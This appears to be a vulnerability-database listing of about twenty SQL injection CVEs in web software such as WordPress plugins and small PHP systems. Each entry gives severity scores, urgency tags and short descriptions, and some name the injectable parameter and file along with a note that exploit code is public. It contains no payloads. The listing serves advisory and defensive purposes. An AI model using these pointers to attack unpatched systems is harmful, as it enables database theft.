A vulnerability was detected in RainyGao DocSys up to 2.02.36. The affected element is an unknown function of the file src/com/DocSystem/mapping/GroupMemberMapper.xml. [CVSS 6.3 MEDIUM]

SQLi Docsys
NVD GitHub VulDB
CVE-2025-14598
EPSS 0% CVSS 9.8
CRITICAL POC Act Now

BeeS Software BET Portal has SQL injection in the login functionality, allowing unauthenticated attackers to bypass authentication and extract database contents. PoC available.

SQLi Bet E Portal
NVD GitHub
CVE-2025-64092
EPSS 0% CVSS 7.5
HIGH This Week

This vulnerability allows unauthenticated attackers to inject an SQL request into GET request parameters and directly query the underlying database. [CVSS 7.5 HIGH]

SQLi Icx500 Firmware Icx510 Firmware
NVD
CVE-2026-0733
EPSS 0% CVSS 6.3
MEDIUM POC This Month

SQL injection in PHPGurukul Online Course Registration System through 3.1 allows authenticated attackers to manipulate the id/cid parameters in the manage-students.php admin function, enabling unauthorized database access and potential data modification. Public exploit code exists for this vulnerability, and no patch is currently available.

PHP SQLi Online Course Registration System
NVD VulDB
CVE-2026-0729
EPSS 0% CVSS 4.7
MEDIUM POC This Month

SQL injection in the Intern Membership Management System 1.0 add_activity.php file allows authenticated administrators to manipulate the Title parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. The flaw enables an authenticated attacker with high privileges to compromise data confidentiality and integrity.

PHP SQLi Intern Membership Management System
NVD GitHub VulDB
CVE-2026-0728
EPSS 0% CVSS 4.7
MEDIUM POC This Month

SQL injection in the Intern Membership Management System 1.0 admin deletion function allows authenticated attackers with high privileges to manipulate the admin_id parameter and execute arbitrary database queries remotely. Public exploit code is available for this vulnerability, which affects PHP-based deployments. The vulnerability enables unauthorized data access, modification, and potential denial of service with no patch currently available.

PHP SQLi Intern Membership Management System
NVD GitHub VulDB
CVE-2025-61548
EPSS 0% CVSS 9.8
CRITICAL POC Act Now

Print Shop Pro WebDesk 18.34 has SQL injection in the hfInventoryDistFormID parameter of GetUnitPrice. Combined with CVE-2025-61546 (negative quantities), this endpoint has two critical vulnerabilities. PoC available, fixed in 19.69.

SQLi Print Shop Pro Webdesk
NVD GitHub
CVE-2025-61246
EPSS 0% CVSS 9.8
CRITICAL POC Act Now

online-shopping-system-php 1.0 has SQL injection in review_action.php via the proId parameter. PoC available.

PHP SQLi Online Shopping System
NVD GitHub
CVE-2026-21892
EPSS 0% CVSS 5.3
MEDIUM POC PATCH This Month

SQL injection in Parsl's visualization dashboard allows unauthenticated attackers to execute arbitrary database queries through unsafe string formatting of the workflow_id parameter. Public exploit code exists for this vulnerability, enabling potential data theft or database denial of service attacks against the monitoring infrastructure. The issue affects Parsl versions prior to 2026.01.05, which includes the fix.

Python SQLi Denial Of Service +1
NVD GitHub
CVE-2026-22242
EPSS 0% CVSS 4.9
MEDIUM POC PATCH This Month

Blind SQL injection in CoreShop prior to version 4.1.8 allows authenticated administrators to extract sensitive database information through boolean-based or time-based attack techniques. The vulnerability is limited to information disclosure due to the application's read-only database permissions, preventing data modification or denial of service. Public exploit code exists for this vulnerability; administrators should upgrade to version 4.1.8 or later.

SQLi Coreshop
NVD GitHub
CVE-2025-67928
EPSS 0% CVSS 9.8
CRITICAL Act Now

Automotive Listings WordPress theme (through 18.6) has blind SQL injection enabling unauthenticated database extraction.

SQLi
NVD
CVE-2025-67921
EPSS 0% CVSS 9.8
CRITICAL Act Now

Lobo WordPress theme (before 2.8.6) has blind SQL injection enabling unauthenticated database extraction.

SQLi
NVD
CVE-2025-23993
EPSS 0% CVSS 9.8
CRITICAL Act Now

Felan Framework (through 1.1.3) also has SQL injection in addition to the auth bypass (CVE-2025-23504). Two critical vulnerabilities in the same plugin create a devastating attack chain.

SQLi
NVD
CVE-2025-22728
EPSS 0% CVSS 9.8
CRITICAL Act Now

Workreap WordPress plugin (through 3.3.6) has SQL injection enabling unauthenticated database extraction. A freelance marketplace plugin likely containing user PII and financial data.

SQLi
NVD
CVE-2025-22713
EPSS 0% CVSS 9.8
CRITICAL Act Now

WooCommerce Orders & Customers Exporter (through 5.4) has SQL injection enabling unauthenticated extraction of all order and customer data including payment details and personal information.

WordPress SQLi PHP
NVD
CVE-2026-0701
EPSS 0% CVSS 4.7
MEDIUM POC This Month

SQL injection in the admin panel of code-projects Intern Membership Management System 1.0 allows authenticated attackers with high privileges to manipulate the Username parameter in /intern/admin/add_admin.php and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. Affected organizations should restrict administrative access and consider implementing input validation controls or upgrading to a patched version when available.

PHP SQLi Intern Membership Management System
NVD GitHub VulDB
CVE-2026-0700
EPSS 0% CVSS 7.3
HIGH POC This Week

Intern Membership Management System versions up to 1.0 contain a SQL injection vulnerability (CVSS 7.3).

PHP SQLi Intern Membership Management System
NVD GitHub VulDB
CVE-2026-0699
EPSS 0% CVSS 4.7
MEDIUM POC This Month

SQL injection in the Intern Membership Management System 1.0 admin panel allows authenticated attackers with high privileges to manipulate the activity_id parameter in edit_activity.php, potentially leading to unauthorized data access, modification, or deletion. Public exploit code exists for this vulnerability, though no patch is currently available.

PHP SQLi Intern Membership Management System
NVD GitHub VulDB
CVE-2026-0698
EPSS 0% CVSS 4.7
MEDIUM POC This Month

SQL injection in the Intern Membership Management System 1.0 admin panel allows authenticated attackers with high privileges to manipulate the admin_id parameter in /intern/admin/edit_students.php and execute arbitrary database queries. Public exploit code exists for this vulnerability, enabling attackers to read, modify, or delete sensitive data. No patch is currently available to remediate this issue.

PHP SQLi Intern Membership Management System
NVD GitHub VulDB
CVE-2026-0697
EPSS 0% CVSS 4.7
MEDIUM POC This Month

SQL injection in the Intern Membership Management System 1.0 admin panel allows remote attackers with high privileges to manipulate the admin_id parameter in /intern/admin/edit_admin.php, potentially enabling unauthorized data access or modification. Public exploit code exists for this vulnerability, and no patch is currently available.

PHP SQLi Intern Membership Management System
NVD GitHub VulDB

Quick Facts

Typical Severity
HIGH
Category
web
Total CVEs
4539
